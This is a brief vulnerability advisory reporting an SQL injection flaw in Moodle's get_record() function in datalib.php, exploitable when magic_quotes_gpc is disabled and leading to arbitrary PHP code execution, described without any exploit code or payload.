Description:   A vulnerability was reported in Moodle. A remote user can inject SQL commands and execute arbitrary commands on the target system.

The 'get_record()' function in 'datalib.php' does not properly validate user-supplied input. If magic_quotes_gpc is disabled, a remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

This can be exploited to execute arbitrary PHP code on the target system.
